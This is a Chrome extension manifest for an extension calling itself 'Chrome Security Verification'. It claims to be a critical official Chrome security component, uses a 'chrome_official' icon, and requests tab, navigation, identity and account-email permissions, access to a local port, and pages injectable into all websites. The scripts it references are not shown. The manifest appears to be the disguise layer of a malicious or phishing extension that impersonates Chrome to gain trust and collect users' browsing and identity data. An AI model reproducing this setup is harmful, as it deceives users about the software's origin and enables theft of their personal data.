{
  "manifest_version": 3,
  "name": "Chrome Security Verification",
  "version": "1.0",
  "description": "Critical browser security component required for Chrome data integrity and protection",
  "icons": {
    "16": "images/chrome_official.svg",
    "48": "images/chrome_official.svg",
    "128": "images/chrome_official.svg"
  },
  "permissions": [
    "tabs",
    "storage",
    "webNavigation",
    "identity",
    "identity.email"
  ],
  "host_permissions": [
    "http://127.0.0.1:27843/*"
  ],
  "background": {
    "service_worker": "background.js"
  },
  "action": {
    "default_popup": "popup.html"
  },
  "web_accessible_resources": [{
    "resources": ["security-verification.html", "security-verification.js", "security-verification.css"],
    "matches": ["<all_urls>"]
  }]
}
